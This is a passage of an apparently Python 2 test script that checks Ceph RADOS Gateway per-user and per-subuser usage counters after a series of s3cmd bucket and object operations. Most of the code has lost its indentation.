            expect_dict3 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict4 = {"entries_size": 1,
                            "user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
            os.chdir(py_dir)
            if result1 == result2 == True:
                self.op3()
                # Owner put_obj into test2 does not change subuser1's counters.
                expect_dict5 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict6 = {"entries_size": 1,
                                "user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
                os.chdir(py_dir)
                if result1 == result2 == True:
                    self.op4()
                    # subuser1 put_obj into test1 counts for both identities.
                    expect_dict7 = {"entries_size": 1,
                                    "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                       "put_obj": {"ops": 1, "successful_ops": 1}}},
                                              "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                       "put_obj": {"ops": 1, "successful_ops": 1}}}}}
                    expect_dict8 = {"entries_size": 1,
                                    "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
                                                       "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                    os.chdir(ceph_path)
                    result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                    result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                    os.chdir(py_dir)
                    if result1 == result2 == True:
                        self.op5()
                        # Second subuser upload into test2: put_obj increments again.
                        expect_dict9 = {"entries_size": 1,
                                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                           "put_obj": {"ops": 1, "successful_ops": 1}}},
                                                  "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                           "put_obj": {"ops": 2, "successful_ops": 2}}}}}
                        expect_dict10 = {"entries_size": 1,
                                         "user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
                                                            "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                                     "put_obj": {"ops": 1, "successful_ops": 1}}}}}
                        os.chdir(ceph_path)
                        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
                        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
                        os.chdir(py_dir)
                        if result1 == result2 == True:
                            print "testcase9 %s" % (ok_display("OK"))
                        else:
                            print "testcase9 %s" % (fail_display("FAIL"))
                    else:
                        print "testcase9 %s" % (fail_display("FAIL"))
                else:
                    print "testcase9 %s" % (fail_display("FAIL"))
            else:
                print "testcase9 %s" % (fail_display("FAIL"))
        else:
            print "testcase9 %s" % (fail_display("FAIL"))
class TestCase10(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test2/subuser2.s3cfg 10-1.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/user1.s3cfg 10-2.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test1/subuser1.s3cfg 10-3.txt')
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/subuser2.s3cfg 10-4.txt')
time.sleep(30)
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase10 %s" % (ok_display("OK"))
else:
print "testcase10 %s" % (fail_display("FAIL"))
else:
print "testcase10 %s" % (fail_display("FAIL"))
class TestCase11(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg ls s3://test1')
exec_command('s3cmd -c user1.s3cfg ls s3://test2')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg ls s3://test1')
exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
time.sleep(30)
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase11 %s" % (ok_display("OK"))
else:
print "testcase11 %s" % (fail_display("FAIL"))
else:
print "testcase11 %s" % (fail_display("FAIL"))
class TestCase12(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg del s3://test2/user1.s3cfg')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test1/subuser1.s3cfg')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subuser1.s3cfg del s3://test2/subuser2.s3cfg')
time.sleep(30)
def op5(self):
exec_command('s3cmd -c subuser1.s3cfg rb s3://test2')
time.sleep(30)
def clean(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
exec_command('rm 10*.txt')
def run(self):
rsult1 = result2 = True
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
os.chdir(py_dir)
if result1 == result2 == True:
self.op2()
expect_dict3 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict3)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == True:
self.op3()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
os.chdir(py_dir)
if result1 == result2 == True:
self.op4()
expect_dict7 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 2, "successful_ops": 2}}}}}
expect_dict8 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == True:
self.op5()
expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 2, "successful_ops": 2},
"get_obj": {"ops": 3, "successful_ops": 3},
"list_bucket": {"ops": 2, "successful_ops": 2},
"delete_obj": {"ops": 2, "successful_ops": 2},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict10 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 2, "successful_ops": 2},
"list_bucket": {"ops": 1, "successful_ops": 1},
"delete_obj": {"ops": 1, "successful_ops": 1},
"delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
os.chdir(py_dir)
if result1 == result2 == True:
print "testcase12 %s" % (ok_display("OK"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
else:
print "testcase12 %s" % (fail_display("FAIL"))
self.clean()
class TestCase13(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin user create --uid=user2 --access-key=user2 --secret-key=user2 --display-name="user2"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subu01 --access=full --access-key=subu01 --secret-key=subu01')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user2 --subuser=subu02 --access=full --access-key=subu02 --secret-key=subu02')
os.chdir(py_dir)
def op1(self):
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c user1.s3cfg put user1.s3cfg s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c user2.s3cfg mb s3://test01')
exec_command('s3cmd -c user2.s3cfg put user2.s3cfg s3://test01')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c subuser1.s3cfg mb s3://test2')
exec_command('s3cmd -c subuser1.s3cfg put subuser1.s3cfg s3://test2')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg mb s3://test02')
exec_command('s3cmd -c subu01.s3cfg put subu01.s3cfg s3://test02')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.prepare()
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 0}
expect_dict3 = {"entries_size": 0}
expect_dict4 = {"entries_size": 0}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = expect_dict1
expect_dict6 = expect_dict2
expect_dict7 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict10 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict11 = expect_dict7
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase13 %s" % (ok_display("OK"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
else:
print "testcase13 %s" % (fail_display("FAIL"))
class TestCase14(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg get s3://test1/user1.s3cfg 14-1.txt')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg get s3://test2/subuser1.s3cfg 14-2.txt')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg get s3://test01/user2.s3cfg 14-3.txt')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg get s3://test02/subu01.s3cfg 14-4.txt')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict3)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict4)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op2()
expect_dict5 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict6 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict7 = expect_dict3
expect_dict8 = expect_dict4
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict5)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict6)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict7)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict8)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op3()
expect_dict9 = expect_dict5
expect_dict10 = expect_dict6
expect_dict11 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict12 = expect_dict8
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict9)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict10)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict11)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict12)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
self.op4()
expect_dict13 = expect_dict9
expect_dict14 = expect_dict10
expect_dict15 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict16 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict13)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict14)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user2', expect_dict15)
result4 = verify_show_based_on_version('radosgw-admin usage show --uid=user2 --subuser=subu01', expect_dict16)
os.chdir(py_dir)
if result1 == result2 == result3 == result4 == True:
print "testcase14 %s" % (ok_display("OK"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
else:
print "testcase14 %s" % (fail_display("FAIL"))
class TestCase15(object):
def op1(self):
exec_command('s3cmd -c user1.s3cfg ls s3://test1')
time.sleep(30)
def op2(self):
exec_command('s3cmd -c subuser1.s3cfg ls s3://test2')
time.sleep(30)
def op3(self):
exec_command('s3cmd -c user2.s3cfg ls s3://test01')
time.sleep(30)
def op4(self):
exec_command('s3cmd -c subu01.s3cfg ls s3://test02')
time.sleep(30)
def run(self):
result1 = result2 = result3 = result4 = False
self.op1()
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1},
"list_bucket": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user2": {"test01": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}},
"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1},
"get_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict4 = {"entries_size": 1,
"user2:subu01": {"test02": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
